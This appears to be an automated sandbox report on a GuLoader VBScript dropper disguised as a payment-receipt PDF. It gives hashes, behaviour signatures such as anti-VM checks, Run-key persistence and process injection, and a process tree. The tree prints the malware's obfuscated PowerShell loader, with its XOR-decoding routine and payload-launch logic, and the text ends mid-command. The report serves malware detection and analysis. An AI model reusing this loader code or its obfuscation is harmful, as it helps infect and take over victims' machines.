Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23-03-2023 14:26

General

  • Target

    Tb2_payment_receipt_pdf.vbs

  • Size

    304.0MB

  • MD5

    7f50ce31436aa43c5f650c5ba244606e

  • SHA1

    f07844cdad4a0c1286f38312169ac38e497662e5

  • SHA256

    4414b7a789914f859fc68e5a6e984fed0d4ee0068c1f2432a29d838efbf04179

  • SHA512

    949b2ff3e4ade813a6efd94aef292d420d5ae5582c3bf9521127829f99c59271f4758f31b2d4df7fd4288472cb561e4f30e115f5b0041e972848cfc816e3de3d

  • SSDEEP

    768:Zg+nD+EDiLl7higyKeOPqK8ntFYCTMMiKc5mKm2:ZgGFol0gPqK8fvTZcZb

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of FindShellTrayWindow 50 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Tb2_payment_receipt_pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Indkomst = """DFSu nDcAt i oAn nAa tHt e rNgTaNlR0 2l {L A p aSr a m ( [NSBtWrEiFn gW]S`$UoFb j e k tSg ls)O; B`$ TGn dMi nD = `$ o b j e kTtDg lG.ULAeMn gOt hS;R R`$ ATrpkAaOd eFr sM P= IN eSwT-wO bCjBeScKtN b yCt e [I]B ( `$ TTnDdCiPnT D/F Y2S)P;U S C N PF oBr (U`$BHKyEdFr oic u =S0N;V `$CH y dBrMoNc u P- l t `$KTKnAdIiSn ;s `$GH yNdIr oOcUuS+O= 2 )P{ M I K`$ T u rSg o r s cM2 0F1O P=g W`$ oPblj eOk t gRlP.FS u bSs t rGirnkgT( `$HHYyndSrOoMc uo,B 2 )V; N U A C`$RALrPkTa d eCr sT[ `$ Hrybdsr o cVuT/ 2M]c =K [PcMoSn vMe rDtW]H:K:CTSo BIyNt eV(M`$PTBuSrSg oGrSsEcG2G0M1 ,N 1 6P) ;S A k`$DA rAk aRdPePr s [S`$ H y d r oscKu /B2S] =B N( `$JAMr k a d e rBsG[ `$SHPyLd r omcOuP/R2C] R-ubbxSoNr R1O3C7 ) ;F H U} H[ SStDrniAnTgR] [RS y s tAe mg. TNeuxZt .EERnHcUoEdRiEnTgS]B: :kA SFCJIPIR. G eNt SOtFrWi nHgL( `$ A r kRaSdAe r sU)k;d}DS eSt - C oKnTtPe n tD D'TE :A\ n aRt t e rKg avlH0S3D' L' 2E' ;A`$ GSg eLh vaiKdSeVsPt =H IGcectT-BC o nTt eFn tS 'VE :F\FnBa tPtMe r gSaSlT0 3 'x;U`$rCDoNaNdBjS0a= nIa t t eNrSgUa lh0 2M T'RD ARFm0PFAASF DBEBCEE 4 AS7LEMD EL5NEU5C'V; i f B( `$BG g eShPv iGdCe s tS -BeAqA C' 2M'P) s{O`$ CPoFaCdGj 0K=P'E'R} ;G`$IC o a dMjK1 = n a tCtPeUrAgFa lM0r2T 'KC 4SEC0DEIACFUBAE 6AFPA ES6AEIF F D A 7 DVE EO0 EW7eBrADB B A 7UDSCHER7TF ASEE8RE F ESCCC 7 EP8KF DAE 0 F FREPCBC 4NE CHF DSEM1JEU6BE D FSAT'r; `$MCOo aPd j 2 =ZnDa tut e rgg aTlK0 2u 'OCDE E COFFD DP9KFDBME 6 E APCS8 EvDOEEDuFnBFEdC FLAPFWA 'M; `$MC oFa dCj 3K=In aMtmtPe rSgsaSl 0 2S R' D AAF 0 F AcF D E CRET4LA 7OD BsFUCkE 7AFBDOET0RE 4TEACSAL7SCK0BEB7 FSDPEcCKFRBLE 6 FS9 DJA ETCCFJBTFSF EG0BESASE CHF A A 7TCS1 EU8 EY7CE D EM5 EPC DTB EMC EKF 'D;F`$ CAo aBdGjA4r= nFaTt t e r gKaPl 0 2F ' FGA FPD FTBSEF0 EU7GEPE 'V;n`$SC oRaCdPjc5T= nSaBtUtWeIr gPaylL0 2H T'ECBE E C F D C 4KE 6 ESDCFmCSER5 EUC C 1 ET8 ES7GE D EP5 E CP' ;E`$FC oHa dSj 6G= nCaOt tReOrMgNa l 0 2M D'BD BUDKD D A FP9 ERCSEYAPEF0 E 8 ES5 Ct7AES8VER4EE CJA 5HAS9sCS1CEL0NE 
DSE CFCGBVF 0 D A E 0 E EJA 5 A 9VDN9MFTCBEABaEI5FED0TE A 'W;S`$ CFo a d j 7m=BnGa t tUeIrOgHa lC0S2 K'EDHBGF C EB7 FRD EC0VEt4HECCJA 5EAP9MC 4GE 8 E 7pE 8 EEE ETCRE DF' ; `$SC o aNdFj 8 = nBa t tTeJrhgoa lA0P2Q 'ZD BHEAC E FPEN5MEWCCEQA F D EACMEsDsCODCE CCE 5OEPCFEGECER8dFWDAE CL'D;l`$SC onafdPjA9P= n aOt t eHr gSa lP0J2S 'RCF0SES7 CM4 E CWES4FER6NFRBRF 0GC 4 EU6EECDDFFC E 5vEHC 'R; `$HeUv aSl u 0H=PnAaAtBt eTrSgOaMlF0U2b M'KCG4AF 0 CCD EAC EM5 EKC ETErEA8FFZD ESC DED Fi0vF 9EE CF' ;J`$LeUv aTl u 1B=RnsaFt tAeVrSg aVlV0S2L L'LCKA E 5FEP8 F AMF A AN5RAa9TD 9 F CuE BHEI5VEv0 ESA A 5OAN9 DAA EUC ES8 EU5BE C ESD AH5BA 9 C 8MED7TF AUE 0GCOArEF5KEV8PFBA FPA AP5TAF9SCB8 FOCAFEDME 6HC AAE 5OE 8AFGAUFFAN'T; `$BeSvca lTuM2M= nSaitDt eArAgFa l 0C2w P'WC 0aE 7SF FTEh6 E 2pE CA'D;E`$Fe vFaSlSuF3 =GnFaDtOt e rFg aFlT0A2B A'AD 9BFUC EBBOE 5 EU0RENA AL5 AS9 C 1 E 0 E D E CSCUBBFI0EDUAtE 0RE EFAN5SAa9 CF7 E C F E DRA E 5SE 6HF DIA 5FA 9 D FEEP0 F B FADKFpCDE 8HE 5S'T;S`$ e vsaFlBuf4S=fn a t tgeAr gBaHlH0D2D a' D F Em0 FOBUFTD FuC EU8NEO5 C 8 EK5HE 5OET6 EYA ' ; `$HeBvKaRl uS5h=Rn aPt tMeErLgCa lB0 2 P'NED7aFEDKEBD EA5BE 5S'P;I`$ ezv aMl u 6D= nKaDtVtIeErIg aTlM0K2E P'KCD7 FRDPDn9 FRBMEs6PF DFEDC ESAPF DFDFFCEB0KFKB FWD FLClEF8MET5uC 4HE C EC4XEK6UF BiFN0A'S; `$SeSv a lNu 7P=Un a t t e rpg aAlM0s2 K' CU0 CTC D 1D' ; `$ eFvMaSlMuT8P=un a t t ehrTg aHlO0 2 j'DDD5D' ;B`$ KDr uHmEmSeArPn eA2S3N7A= nRaSt tae rMgJaAlH0 2D 'VDtCWDSA CACSDhB BSALB BH'H;S`$BF rta v aFlm= n aBtFt eUr g a lD0A2b D' CAASES8AEL5 EN5SDBESE 0 E 7UE DRE 6CFPE DA9PF BkEa6 E AECC8R' ;tfDu n cNtUi oJn fGkUp {SPPagr aAmG U(O`$STSa dIpao lD,B `$OAmlSvIoVrMs )S R P S D M;m`$ t o m hFyApUhSeMnAsp0D = nTa t t e rYgUa l 0P2 ' A DTDKFIET0 E 5TEA2rEC8PEH8 F BFE 5BAR9UBn4 As9 Ap1 DP2PCA8 FR9 FM9NCDDAE 6tEU4FEP8 EL0 EM7PDP4LBI3MBM3VCCAuFBC F B F BKE CjEG7 FRDDCDD EU6REZ4 EP8cEA0GE 7 AM7 CCEDE C FODSC 8VFMA FIAMErC E 4 ERBREU5pEF0 EKCFFMA AT1SAA0TA 9PF 5JA 9CDtEVEH1HEEC FCBGEcC AS4 C 6 EEBTER3 ESC ECAAF DSAU9AF 2 A 9TA DJD 
6WAS7 CDE EA5GEO6SE BPEU8 E 5 C 8IFPA FYASE CPES4 E B E 5PFR0 C A Ec8SE AJEM1 ESC AU9BA 4 CT8FEP7eE D AT9AA D Dm6 AG7 C 5VEC6DE ASEm8PFUDHEi0FEp6 EM7uA 7 D ALFS9UEU5FEU0RFBD AP1PAKD E CCFSF E 8 ED5SF C Bs1 A 0OD 2PAO4 B 8 DS4 A 7NCFC F 8MF ChEB8lET5 FFA A 1DA DTCBASEI6 ES8OE D ED3GBV9RA 0 A 9SF 4WAS0 A 7 C ETE C FKDDDGD FC0 FS9DECCSAu1 ACD CsA E 6OE 8LE D E 3 B 8BAF0E' ;N& (S`$eeBv aMl uP7 )T H`$RtDoPm hMyZp hHeDnTs 0S;I`$mtUoDmSh yVpPhBeLnUs 5 R= DnIaOt taeTrFgCa l 0C2H A' A DZCb5SF BSE CPEPBhE 6 E EFF AsFKAAAM9 BJ4OAB9 AED DFFDE 0BEB5 EB2IE 8 EB8CF B Ei5SAf7BCTEIE CGFFDICS4HEBC F D E 1 EP6NE DBA 1 AID CSA E 6 EC8 E DCEU3 B BVA 5RAS9 D 2 DCDTFU0HFP9GE C DS2GDT4CDT4 AO9ECI9 AM1PAdD C ASE 6 EE8HEPDAEa3rBIA AO5UA 9FA DaC AFEH6dEb8 EBD EA3CBUD AI0 A 0 'K; &U(K`$ e v aRl uT7A)D L`$ tLoGmKhTyLp h eTn sS5 ;D`$ tPo m heyBpHh e nDsi1S = n a tAtCeAr gAaMlS0S2H d'TFAB E CRFADIF C FABAE 7 AM9IAFDDCM5AFKBOEAC E BAEP6 E E FFARF AKA 7 C 0SEF7 FJFIEr6DEp2PEDC AO1BARD EB7PF CGET5PET5SAS5KAD9 CT9AAT1 DI2DDLA FL0 FHA F DEEDCAET4FAJ7BDBB FKC E 7 FYDIES0 E 4 EIC AL7aC 0NE 7LFBD E CUF B ES6pF 9 DAA E CDFRBTF FTE 0BELAHE C F APAU7 CA1CE 8KEI7 E DPED5FEDC DGBCE C ESFSD 4 AI1 C 7PEDC FDE AD4ICT6KEABSE 3BEKCBELA FGDpAB9bDEATF 0 FTAPFLDFE C ES4PAF7SD BMF C Ec7EF DrES0 EP4 EDCnA 7 Ck0PE 7SF D E C F BBE 6 FV9NDPA E COF BDFRFEE 0 EHAPEiCTF ASAh7ECI1 EA8pEG7UE D ES5 E CMD BSEICTE FTAO1 AK1 CB7TE CTFSE A 4CC 6MEFB ET3SE C ETA FPD Ae9 Ce0 Es7 FAD D 9MFKDBF BPA 0MA 5SA 9RA 1PA D DMFIE 0 ES5OEB2nE 8 ED8 F BdES5HA 7 CMEOE CbFTDSC 4AEKC FMD E 1 EH6OEID AS1 AaD CDAjEH6SE 8 E DtEB3 B C AF0 AA0 A 7 C 0 ES7 FTFIE 6DED2UE C AS1 ABD E 7 FFC EO5ZER5MAC5TAA9IC 9LAB1 AKDGDFD E 8LE DTFH9 E 6 EC5 AF0 AU0FAH0IAS0 AE5 AL9SARDCCP8KED5 FBF E 6 FOB FGACA 0 A 0B'B; &O(T`$fepviaslSu 7N)V D`$CtFoVm hSyApLhsesn s 1P;D}SfAu nCc tGisoSn CGBDUTM {DPTaMr a m C( [ P aNrua maeFt eErC(UPIoVsPiTtTiHoSnE m= 0H,C OM aTnIdHa t o rFy A=B `$ TDruuUeC)H] s[aTPyKp e [ ]D]P p`$ULBeFv nDe ,L[ PAaKrSaMm eOt e rT( P oVsOi t iHohn = W1 ) 
]N [ T yIp eK]P `$ p r e zOoPnVa H= E[RVBo i d ]A)M; `$ t o m h yGpIh e n sS2 B=V EnSa t tNeUrHg aPl 0 2M 'oAODPCD3 E CHF C E F E 6 FIBAAR9 BA4DAT9PDC2JCS8KFN9 FV9 CgD E 6WEL4 E 8 E 0HEA7BDR4 BU3 BA3VCLA F CPFUBPF B ELC EP7 F D CODVEP6TET4 E 8 ED0GEC7 Au7EC DFE CDEAF EO0 ER7FE CICHDSF 0 EF7 EN8 EF4SEO0SE ASC 8 FSA F A ETC E 4AELBOEF5AFT0 AI1AA 1 CR7aESCCFME A 4 C 6SE B Ed3vE C EBA FPD A 9EDBA Fa0PF A FKDNE CWEs4DA 7HD B ENC EGFSE 5AE C EAAiFFDaE 0SE 6 E 7aA 7JCO8IF AUFKA E CAES4GESB E 5LF 0 CU7NEB8REK4 E CTAB1TAUD CLA EH6 EP8UE DNE 3LB 1BAU0KAB0CAS5HAS9HD 2 DRA FR0HFYAFF DNE C E 4IAl7 DGB ESCAE FCEP5 ERCBE A FWD Es0 E 6PE 7CAv7 C CPE 4 E 0SFBDLAS7SCB8KFEArF A E CSEW4 E BCE 5LF 0BCFB FUCTES0GEO5 EBDSEUCDF BDC 8DESA EbAFECCfFOA FIANDW4 B 3 B 3 D BEFGC ET7sAI0 A 7 CFDDETCRE FFEf0 EV7 E CSC D F 0 E 7NE 8FER4PE 0GEOA C 4 EU6AEADAF CFEB5 E C AY1AA DRCUA EM6 EL8MEOD E 3GB 0BAG5LAE9BAMDAEKFGEU8uE 5 F A E CiAH0TA 7DCHD EPCUEAF E 0OE 7LE C DADVFK0GF 9 E CCAs1OA DPE C F F E 8NEC5AFMC B 9KAR5 AR9PA DPE C F FKE 8 E 5 FVCSB 8CA 5NAS9UDH2 D A Fk0BFSAFFEDdE CSE 4 A 7DCs4HF CPE 5AFBDHE 0CE AIEK8 FPATFSDACVDDE CLE 5tECCAESEDE 8 FRD EHCADG4MAN0 'P;D&P(L`$ esvPaClCu 7S)I T`$StGoTmFhTy p h eGnTs 2C;L`$EtRoBm h y p h eBn sC3D C= PnUa t tueHrPg aAlB0 2 U' A DRC 3SENCMF C ETFME 6HFPB Ac7 C DPEECKEAFBES0UEB7ME C CiABES6RER7OF AgF D F B F CCEDA F DOEK6 FJB AN1 AUDKC ARE 6 E 8PEPDEE 3 BBF A 5AAB9SD 2BDKA FF0FFNArF D EOCPEC4KAV7NDrBSEHC E FKEG5UE C EsA FKD ED0kEN6DED7 AU7 CAABES8REU5EEe5GE 0mE 7 EJE CDA EY6AE 7 FTF ECCQE 7FFDDVE 0TE 6BEE7UFFA DC4 BP3sBM3LDlA F D EA8TEC7PE D EK8KFKBPE DaAS5 AN9 AgDAC 5sE CMFBF EU7REUCPA 0 AP7 DKAPE CPFcDiCA0 E 4OFR9EEU5 EFC E 4FEAC E 7 FAD El8 FPDNEE0NE 6 EF7 CTFKEP5SEE8 E EHFdATAS1EAFD CEATEF6AE 8SE DCE 3 BAE AF0 ' ; &P( `$ eAvBa l uR7C) D`$ t o mKh ySp hSeUnSsS3s;S`$StJo mDhNy pAhCeSn sK4F O= snMaFt tNe r gKaTl 0 2R A' ASDUC 3 ELC FOCKE F E 6 F B AC7SC DPE C E FGER0AEA7 E CDCS4MEPCBFUDPE 1DES6 EMDOA 1GA D EFCNF FbEF8HEF5UF CsBsBEA 5 A 9SA DCEaCHF F EK8 E 5 F 
C BEA AU5PAF9 AcDOFA9 F BSE C FD3 E 6 E 7VEC8uA 5TA 9 A DUCI5oEDC FtF EL7TEUCSAF0KAG7NDSA EBCCFBD C 0BE 4OFH9 Ek5SE CFE 4 E CPES7KF DFE 8 F DNEi0AEA6bEO7SCLFFEO5AE 8EEBE F ACA 1SA DHC A Ea6BE 8 EKD Et3AB ETAN0 'A;K&S(U`$Te vWaLlmu 7P)E R`$Kt oHmPh y poh eSnFsp4G; `$ tLoHm hPy p h eEn sA5S S=K EnMaUt tmeMr g aalS0 2R 'sF BsE C FUDPFBCAF B EU7FA 9 A DUC 3bERC F C ETFPEI6PFAB AO7OCRAFF B E C EF8rFADSEZCUDSD FN0 F 9KENCDAT1DA 0F' ; & (D`$Se vFaGlSuP7 ) S`$AtUoMmPhBy pChIesnUs 5U H U;O}F`$IS aDySaSb l eM B=o cnMaEt tJeSr g aBl 0S2C O' ES2 EACSFSBDEO7UE C E 5 BDABB BE'H;B`$Tt o mSh yGpCh eTnBsD6B P= nLaktVtLe r gAa lS0 2 R'KAED C FKE 5OE 8 ERBTE C Ep5 ER5QES0BET7VE CFAG9SBT4FA 9CD 2 DDA FC0 F ARF DUEEC E 4AAP7SDDB FIC ED7HFDD E 0RE 4 E CSAP7 CN0SE 7CFTDUE CSFBBSEC6bFN9 D A ETCTF B F FBEu0 EDAAEEC FAA AJ7PC 4FEg8EF BDFSALEr1PE 8 Et5OD 4 BB3WBC3GC E E C FNDDCMD EOCPEP5rEMC E ECE 8 F DUETCSCaFUE 6 F B CEF FSC EB7 E A FaD ET0sEA6 E 7BD 9 EF6DEM0SEB7AFDDIEACHFJBSA 1CAL1 ECF E 2AFL9 AU9hASD DTASEJ8 FD0GES8SELBFEB5 ECC AT9 ACDEEJC FRF ES8 EK5 F CKBEDBAS0MA 5 A 9DAB1SC EAC D DCDBA 9 C 9BA 1BDA2NCK0 ED7GF D D 9OF D FsBBDM4GAU5 AS9SDV2FD C C 0SEW7CFFDGBPAUBUB DE4fA 5 Ar9vD 2VDFCTCT0 ER7 F DRBPA BPBBD 4 AS5CAS9 D 2 D CTCT0SEE7 FSD BTAABTBNDS4 A 0 AS9DAB1 D 2SC 0 EV7bF D Ds9DFKDBF B DH4TA 0FAT0 AV0P'P;M& ( `$ eSv aPlMuM7p)r `$Tt oCm hFyTp hSe n s 6T; `$TBLeSn t h oMsFc o p = Uf k p U`$Ke vMa lBuA5S `$seAvSa lVuA6 ;S`$Gt oSmFhmy p hReInUsK7 B= nIa tGt eHrHg aMlA0g2a 'AADDBD A EB2 E EPE CPBSABA 9RBG4DAP9DASDBCiFBED5TEE8 E BPESCSE 5 E 5MEG0PE 7 E C AK7 CG0 En7 FaF ES6 EV2SE CSA 1 DK2 CD0 EI7 FRDTDB9 FTDAF BGD 4GBP3 B 3 DJ3LEPCOF B EC6UAD5 AM9ABBF B ChBV0KAS5RAK9 BL9uFD1UBKAPB 9 BC9UBK9 A 5 A 9IB 9 Ff1 B D B 9GAK0 ' ; & (P`$AeDv aElEuF7C)J S`$StsoImFhDy p hOe nDs 7 ;D`$BtToAmShgyEpkh eAnOs 8 = PnCactDt e rTg aKlB0p2B A'MA DSC BPF B FSC E 7 ET0MFU3CE CBE 4 E A EA1SA 9GB 4 A 9JAHD C FJE 5OE 8DE BSENC E 5 EP5TEK0 E 7 E CSA 7HC 0PEU7SF FCES6AE 2SE COAG1 DM2 C 0 EB7 F D DL9 FADCFPBFD 4OB 3 B 
3ED 3HEAC FABhE 6KAC5 A 9 B DIBSB BlC B 9 BF9NBS9UBN0MBSFKAm5 AF9ABT9 F 1 BKA B 9ABb9TBV9NA 5SAD9 BC9MF 1 BTD A 0R'P;V&T( `$Se vIaMl u 7 ) `$ tSoNm hDySpUhSeRnNst8U;A`$ n a t tTe rTg aAlF0B1 S= En a tVtNeSr gma lU0R2 ' E 1 FhDSFFDSF 9bF AVBV3 A 6 A 6FE EPEG6bF F FTD E 3SE 6 E B E D E 8 FS0BAP7HEG0HEN7 AM6 ET8VEUD ES4 E 0FE 7BA 6 ESB F B EH6KED7CEAA EC1IEY6SF BPFgB EG1SA 7kESAJE 1 EB4D'C;S`$ nUaAtMtOe rag aMl 0D0h =S BnTaBtTt eTrggRa lW0 2 t'CA DGCS6UFSBMEGDIEP7 A 9 BN4SAP9VAS1HCS7DETC FVE Ad4 Cb6 ELBTEA3 EECUENA FPDUAU9 CG7UE CHFPD A 7HD E E CCE BUC ATE 5PE 0 EfCTEA7 FKDSA 0 AA7 C DEE 6 F EDEB7SE 5 EO6PE 8 E D DTAAFPDFFSBBE 0 EL7 EFE AK1SA D EO7RE 8KF D FZD E C FBBUEDEAE 8 EF5 BP9 B 8PA 0 'S;F`$ tNoSmShDyBpfhfe n s 8 S=R nPaUt t e rFgYaKlT0 2G O' ASDUDbACE 2VEFE ERC BSB BU4RAcDCESC E 7FF FCB 3HES8DF 9 F 9 ESDFE 8 FSDSE 8P' ;S&U(V`$NeHv aml u 7 ) q`$ tSo m hTyHpEhSeFnRsF8 ;K`$MSVkFg eC2 = `$US kLg eW2h+ 'Q\ M a sLkLiS.SSUa nB'M; `$ ORr d n = 'l' ;OiBf B( -GnSoEtM(BT eTs t -sPYabt hB D`$FS kVgTeA2T)S) U{MwUh iEl eI (f`$ O rudKn - eTq E'R' ) S{C& ( `$Ue vPa lgu 7 ) `$In aPtUtTeArNgKaFlA0T0 ;HSSt aFrMt -MS lleEeUpW B5U;p}sS eTtD- CMoTn tAeDn ta `$ SUk gMe 2P `$ O r d n ;E}S`$FO r d nG = G eGtG-SC oUn t eEnEt A`$ SKk gVeL2 ; `$Pt oSmKh y pUhAeFnUs 9I S= Rn aEtTt eSrSgOa lf0 2 R'CA D F DMEC6DE 4 EG1 F 0LFM9 EM1 E CKEA7DF ALA 9 BS4GA 9 DJ2iD A F 0TF ACF DGEICSEE4FA 7HCSAUE 6 EC7 FHFIEOCRFLB FNDSDI4PB 3 B 3SCDFFF B EG6GE 4oCSBLE 8DFBAmE CPBSFKBPD D A FPDDFSBVER0CER7 EME A 1 AGDLC 6dFRBiESDDEM7 A 0G'S;W& (D`$EeFvRa l uB7G)D P`$ tSodm hDyppAhAe nAsX9C;K`$ROHrUd n 0 V=B Sn a tUt e rFgcaOl 0 2 ' D 2 D ARF 0 F A FFD E CRE 4 AS7SDTB FDC E 7 F D E 0BEL4 EHC AV7 C 0 EI7SF DFEECKF BJEF6WFc9CDmA ESCFFCBHFEF ES0 E ASE CpFIA A 7 C 4JEA8 F B FQASE 1 E 8KE 5FD 4FBF3 B 3 CPAOE 6 F 9PF 0 A 1SA DSFDDCE 6 EK4AEO1OFA0PF 9EE 1 EGCHE 7SFuA A 5bAM9TBT9KA 5 A 9 AY9FAPD DOACE 2tEgE EBC B A A 5PAS9 BSFTBACKB 0QAR0A'T; & (S`$SeBvPa lSuB7R) k`$ OHrFdLnv0 ; `$ SKaSa dJaPnS=U`$HtPo mRhBySp 
hOeMnPsM.ScToTuKn tG- 6 5K9 ; `$TOEr dMnL1 =R In ast tNe r g a lM0C2A ' D 2CD AOFS0SFSAFFCDiE C EG4 AT7LD B FBCFEC7KFED E 0 EH4GE CFAF7 Cc0BE 7RF DMESCPF BSE 6 Fg9 D A E C FTB FSFSEB0SE A E CBF ASAS7uCN4AEA8CFMBIF A E 1SES8 E 5 Di4DB 3 BC3FC ASEU6FFL9 FP0FA 1IAFDSF DMEF6NEI4 EM1 FF0GFH9EEs1 ELCIE 7HF A AS5 A 9 BBFBB CTB 0MAS5UAh9CA DCC BNFCB FRCOE 7 E 0SF 3 EACREC4SE ABE 1 A 5BA 9OAUDBDfA EI8AEL8SE DFE 8 EN7IAF0 'H;L& (F`$Be vEa l uU7 )S L`$ OMr dKnT1 ;D`$ O r d nV2J D=H Rn aFtMtUe r g a lL0L2R D'FA D CEC F 9HEC0 F DUE 1PE COE 5SAF9 B 4 AC9 DS2SDJAGFS0 FHAUFTD ECCDE 4 A 7 DXB FOCNE 7 F D EP0 EP4 E C AM7HCR0CE 7 F D E CRF BHER6 F 9BD ATE C FCBRFSFGE 0 ESASETCUF AMA 7SCF4 E 8AF BTF AOE 1KEC8 EE5GDN4 BP3 BA3sCAEAEBCAF DCCJDhERCFES5HEAC EPEDEF8PFODFEUCOCEFHE 6SF BMC FBF C EG7EE ARFVDKES0SEF6 ET7 D 9DE 6 Ea0REM7IFRD E C F BNA 1 AF1 EIFDE 2TFS9CAS9 ABDSCA2mF B FSCAET4 E 4 EYCAF BCE 7REPCGBPBFBRA B E AE9MABD CCFAF BSED8BFNFDE 8 E 5 AA0FA 5TAI9AA 1IC E CPDGD D A 9 C 9UA 1AD 2 C 0 EO7OFPDEDr9HF DOF BBDT4LAN5 AE9 DV2 CI0 EA7VFVD D 9 FMDVF BMDk4 A 5PA 9 D 2GC 0 E 7 FFD D 9 F D F BTDC4PA 5DAR9FDP2ECS0 E 7 FJDRD 9SF DLFAB DR4 AT5 As9CDF2OC 0 EA7PFSDKD 9CF DBF BuDO4 A 0AAB9PAT1 D 2OC 0 EN7LF DDDB9 FTDHF B DO4 AT0 AM0lA 0 'I;O& ( `$Ge v a lauD7 )F d`$CORrTdSnD2 ;s`$KOPr dAn 3E S= GnTaftAt e r g aBlO0N2 ' A DFC CWF 9lE 0TFSDPEP1KE CpE 5AA 7TCC0 E 7QF FSEJ6CEV2BE C A 1 AUDbD ADEG2 ECEFEAC B AFAB5FA DAC B FSBDF C EK7TE 0HFB3PEMCSET4 E AUE 1 A 5DAPDCCFBME CMES7UF D EO1 E 6PF ASEKAAEM6 FB9PAB5 Bs9 A 5 B 9RAM0 'O; & (U`$FeCvSa l u 7S) `$ O rKd nL3 # ;""";Function Ordn9 ([String]$objektgl) { For($Hydrocu=1; $Hydrocu -lt $objektgl.Length-1; $Hydrocu+=(1+1)){ $nattergal = $nattergal + $objektgl.Substring($Hydrocu, 1); } $nattergal;}$Skiliften0 = Ordn9 ' ISE Xu ';$Skiliften1= Ordn9 $Indkomst;if([IntPtr]::size -eq 8){.$env:systemroot\S*6*\W*Power*\*1.0\po*ll.*xe $Skiliften1 ;}else{&$Skiliften0 $Skiliften1;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:180
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function nattergal02 { param([String]$objektgl); $Tndin = $objektgl.Length; $Arkaders = New-Object byte[] ($Tndin / 2); For($Hydrocu=0; $Hydrocu -lt $Tndin; $Hydrocu+=2){ $Turgorsc201 = $objektgl.Substring($Hydrocu, 2); $Arkaders[$Hydrocu/2] = [convert]::ToByte($Turgorsc201, 16); $Arkaders[$Hydrocu/2] = ($Arkaders[$Hydrocu/2] -bxor 137); } [String][System.Text.Encoding]::ASCII.GetString($Arkaders);}Set-Content 'E:\nattergal03' '2';$Ggehvidest = Get-Content 'E:\nattergal03';$Coadj0=nattergal02 'DAF0FAFDECE4A7EDE5E5';if ($Ggehvidest -eq '2') {$Coadj0=''};$Coadj1=nattergal02 'C4E0EAFBE6FAE6EFFDA7DEE0E7BABBA7DCE7FAE8EFECC7E8FDE0FFECC4ECFDE1E6EDFA';$Coadj2=nattergal02 'CEECFDD9FBE6EAC8EDEDFBECFAFA';$Coadj3=nattergal02 'DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C1E8E7EDE5ECDBECEF';$Coadj4=nattergal02 'FAFDFBE0E7EE';$Coadj5=nattergal02 'CEECFDC4E6EDFCE5ECC1E8E7EDE5EC';$Coadj6=nattergal02 'DBDDDAF9ECEAE0E8E5C7E8E4ECA5A9C1E0EDECCBF0DAE0EEA5A9D9FCEBE5E0EA';$Coadj7=nattergal02 'DBFCE7FDE0E4ECA5A9C4E8E7E8EEECED';$Coadj8=nattergal02 'DBECEFE5ECEAFDECEDCDECE5ECEEE8FDEC';$Coadj9=nattergal02 'C0E7C4ECE4E6FBF0C4E6EDFCE5EC';$evalu0=nattergal02 'C4F0CDECE5ECEEE8FDECDDF0F9EC';$evalu1=nattergal02 'CAE5E8FAFAA5A9D9FCEBE5E0EAA5A9DAECE8E5ECEDA5A9C8E7FAE0CAE5E8FAFAA5A9C8FCFDE6CAE5E8FAFA';$evalu2=nattergal02 'C0E7FFE6E2EC';$evalu3=nattergal02 'D9FCEBE5E0EAA5A9C1E0EDECCBF0DAE0EEA5A9C7ECFEDAE5E6FDA5A9DFE0FBFDFCE8E5';$evalu4=nattergal02 'DFE0FBFDFCE8E5C8E5E5E6EA';$evalu5=nattergal02 'E7FDEDE5E5';$evalu6=nattergal02 'C7FDD9FBE6FDECEAFDDFE0FBFDFCE8E5C4ECE4E6FBF0';$evalu7=nattergal02 'C0CCD1';$evalu8=nattergal02 'D5';$Krummerne237=nattergal02 'DCDACCDBBABB';$Fraval=nattergal02 'CAE8E5E5DEE0E7EDE6FED9FBE6EAC8';function fkp {Param ($Tadpol, $Alvors) ;$tomhyphens0 =nattergal02 
